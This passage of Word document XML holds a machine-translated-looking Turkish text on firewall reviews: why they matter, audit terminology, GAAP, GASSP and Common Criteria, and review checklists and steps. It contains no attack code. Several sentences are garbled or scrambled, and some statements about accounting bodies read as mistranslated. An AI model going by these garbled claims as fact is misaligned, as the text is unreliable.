        <w:t>Son olarak, bir güvenlik duvarı incelemesinin aynı zamanda bir sertifikalandırma veya ga</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ranti vermediği anlaşılmalıdır. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C26E50">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>güvenlik duvarı işletim sistemi veya temel ağ işletim sistemi tamamen güvenlidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26E50">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Güvenlik Duvarı İncelemesi Gerekliliği</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A4A7A">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İnsanlar gibi güvenlik duvarlarının da gözden geçirilmesi gerekiyor. İşyerinde buna performan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s değerlendirmesi denir. İçinde </w:t>
      </w:r>
      <w:r w:rsidRPr="009A4A7A">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tıbbi arenada buna fiziksel denir. Yanlış yapılandırılmış bir güvenlik duvarı genellikle güvenlik duvarı olmamasından daha kötü olduğu için periyodik güvenlik duvarı incelemeleri için ihtiyaç çok önemlidir. Kuruluşlar güvenlik duvarına sahip olmadıklarında, ilgili riskleri anlarlar ve temel bir güvenlik mekanizmasına sahip olmadıkları gerçeğinin farkındadırlar. Ancak, yanlış yapılandırılmış bir güvenlik duvarı bir kuruluşa yanlış bir güvenlik hissi verir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A4A7A">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ek olarak, güvenlik duvarı genellikle dağıtılan birincil bilgi güvenliği mekanizması olduğundan, güvenlik duvarındaki herhangi bir hata veya yanlış yapılandırma tüm şirkete yayılır. Bir güvenlik duvarı hiç gözden geçirilmezse, bu hatalardan herhangi biri denetlenmeden bırakılır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A4A7A">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Gözden Geçirme, Denetim, Değerlendirme</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00665FF7">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Güvenlik duvarı incelemeleri genellikle denetimler olarak adlandırılır. Bir denetim “metodik bir inceleme </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ve gözden geçirmeau” olarak tanımlanır. </w:t>
      </w:r>
      <w:r w:rsidRPr="00665FF7">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ayrıca, “inceleme”, “değerlendirme” ve “denetim” terimleri de sıklıkla eşanlamlıdır. Big Five 2 muhasebe şirketlerinden güvenlik grupları güvenlik incelemesi yaptığında, özellikle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00665FF7">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“Denetim” terimini kullanmak yasaktır. Bu, Büyük Beşi denetleyen Amerikan Onaylı Kamu Hesapları Enstitüsü'nün (www.aicpa.org) “Beşli Terim” terimini yasaklamasından kaynaklanmaktadır. belirlenmiş çevrenin denetleneceği resmi bilgi güvenliği standartları.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00665FF7" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00665FF7">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Diğer taraftan, Genel Kabul Görmüş </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kullanıcı</w:t>
      </w:r>
      <w:r w:rsidRPr="00665FF7">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> İlkelerine </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">aykırı mali denetimler yapılır. </w:t>
      </w:r>
      <w:r w:rsidRPr="00665FF7">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(GAAP)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C53C37">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C53C37">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Generally Accepted Accounting Principles</w:t>
      </w:r>
      <w:r w:rsidRPr="00665FF7">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Sabit bir kurallar dizisi olmasa da, GAAP yaygın olarak kabul edilen bir kurallar, standartlar ve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00665FF7">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">finansal bilgilerin raporlanması için prosedürler. Finansal Muhasebe Standartları Kurulu (www.fasb.org), 1973 yılında GAAP'ı kurmuştur. Finansal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hesaplama</w:t>
      </w:r>
      <w:r w:rsidRPr="00665FF7">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Standartları Kurulu'nun misyonu, ihraççı, denetçiler, kamuoyunun rehberliği ve eğitimi için mali muhasebe ve raporlama standartlarını oluşturmak ve iyileştirmektir. ve finansal bilgi kullanıcıları.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0081508A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00665FF7">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ocak 2001 itibariyle, Genel Kabul Görmüş Sistem Güvenlik İlkeleri (GASSP) Komitesi, Uluslararası Bilgi Güvenliği Vakfı'nı (IISF) kurma ve finanse etme planlarını yansıtan bir iş planı hazırlamanın ilk aşamalarındaydı.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00665FF7">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Halen, hiçbir güvenlik önlemi kabul edilmiş güvenlik ilkesi bulunmamakla birlikte (güvenlik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">duvarının gerçekten olabileceği </w:t>
      </w:r>
      <w:r w:rsidRPr="00665FF7">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>karşı denetlenmiş), böyle bir standart oluşturmak için çalışmalar sürüyor. GASSP için çalışma grupları var. Halihazırda Yetkili Vakfı araştırmak ve tamamlamak, GASSP çerçevesini geliştirmek ve onaylamak için çalışmalar yapılmaktadır. Komite, GASSP Ayrıntılı Prensiplerini tamamlamak için ayrıntılı bir plan geliştirmiştir ve IISF fonunu güvence altına almak için bu planı uygulamak için planlar yapmıştır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081508A">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bir GASSP’in olmayışı, korumanın korunmasına yönelik hiçbir yetkili re</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ferans olmadığı anlamına gelir.</w:t>
      </w:r>
      <w:r w:rsidRPr="0081508A">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>altyapısı. Bir GAASP olsaydı, GASSP'den makul bir şekilde belirlenmiş istisnaların veya ayrılmaların yetkili onayı için bir araç seviyesini zorlamanın ve bir aracı sağlamanın bir yolu olurdu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081508A">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Teoride GASSP'ye benzer şekilde Ortak Kriterler Projesi'dir (http: // csrc. Nist.gov/cc). Ortak Kriterler, bilgi teknolojisi (BT) ürünlerinin ve sistemlerinin güvenlik özelliklerini değerlendirmenin bir yolu olarak geliştirilen uluslararası bir çabadır. Böyle bir ortak ölçüt tabanı oluşturarak, BT güvenlik değerlendirmesinin sonuçları daha geniş bir kitleye anlam kazandıracak.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081508A">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ortak Kriterler, bağımsız güvenlik değerlendirmelerinin sonuçları arasında karşılaşt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ırıla bilirliğe izin verecektir. </w:t>
      </w:r>
      <w:r w:rsidRPr="0081508A">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BT ürünlerinin ve sistemlerinin güvenlik işlevleri ve güvenlik değerlendirmesi sırasında bunlara uygulanan güvence önlemleri için ortak bir dizi gereksinim sağlayarak bunu kolaylaştırır.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0081508A">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Değerlendirme süreci, bu tür ürü</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">nlerin güvenlik işlevlerinin ve </w:t>
      </w:r>
      <w:r w:rsidRPr="0081508A">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sistemler ve bunlara uygulanan güvence önlemleri bu gereksinimleri ka</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rşılar. Değerlendirme sonuçları </w:t>
      </w:r>
      <w:r w:rsidRPr="0081508A">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bilişim teknolojisi ürününün veya sisteminin amaçlanan uygulaması için yeterince güvenli olup olmadığını ve kullanımında gizli güvenlik risklerinin tolere edilip edilemeyeceğini belirlemeye yardımcı olur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0081508A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081508A">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Güvenlik Duvarı İnceleme Adımları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081508A">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Güvenlik duvarı mimarisinin, güvenlik planlarının ve işlemlerin kapsamlı bir incelemesi şunları içermelidir:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00601DC6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00601DC6">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Çalışanlara ve iş ortaklarına altyapı erişimini yöneten prosedürler altyapı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00601DC6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00601DC6">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Altyapının fiziksel ve mantıksal mimarisi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0081508A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00601DC6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00601DC6">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Altyapının ve altta yatan ağ işletim sistemlerinin donanım ve yazılım sürümleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00601DC6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00601DC6">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Erişim kontrol bilgileri üzerinde altyapı kontrolleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00601DC6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00601DC6">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Günlük olay seçimi ve bildirim kriterlerinin gözden geçirilmesi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00601DC6">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bakım ve yönetim için sağlananlar dahil tüm erişim yolları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00601DC6">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Güvenlik politikaları ve idari prosedürler (yani, kullanıcıların ve hizmetlerin eklenmesi veya silinmesi, cihaz ve sistem denetim kayıtlarının gözden geçirilmesi, sistemin yedeklenmesi ve ortamın saklanması vb.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00601DC6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00601DC6">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kullanıcı hesapları, dosya sistemi izinleri dahil, ağ işletim sistemi üzerinden erişim kontrolleri,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00601DC6">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>çalıştırılabilir dosyaların, ayrıcalıklı programların ve ağ yazılımının özniteliklerini</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00601DC6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00601DC6">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bir izinsiz giriş durumunda, hizmet dışı bırakma durumunda altyapı için Acil Müdahale Planları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00601DC6">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>saldırı vb.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00601DC6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00601DC6">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yayınlanan güvenlik uyarısı bültenlerine erişim ve kullanım</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00601DC6">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Güvenlik duvarı incelemesi yapmanın birçok yöntemi vardır.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00601DC6">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Aşağıdaki altı adımda çoğu merkez:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00601DC6">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Altyapı ve mimariyi analiz eder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00601DC6">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kurumsal güvenlik duvarı politikasını inceleyin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ana bilgisayarları ve ağ değerlendirme taramalarını çalıştırın.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Güvenlik Duvarı-1 yapılandırmasını inceleyin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Güvenlik Duvarı-1 Kural Tabanını inceleyin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F605EB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hepsini bir rapora koyun.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Aşağıdaki tartışma her adımda genişlemektedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F605EB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Adım 1: Altyapı ve Mimariyi Analiz Edin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F605EB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F605EB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Güvenlik duvarının ağı yeterince koruduğundan emin olmak için ağ altyapısını anlamak gerekir. İncelenecek öğeler şunlardır:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F605EB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:jc w:val="both"/>
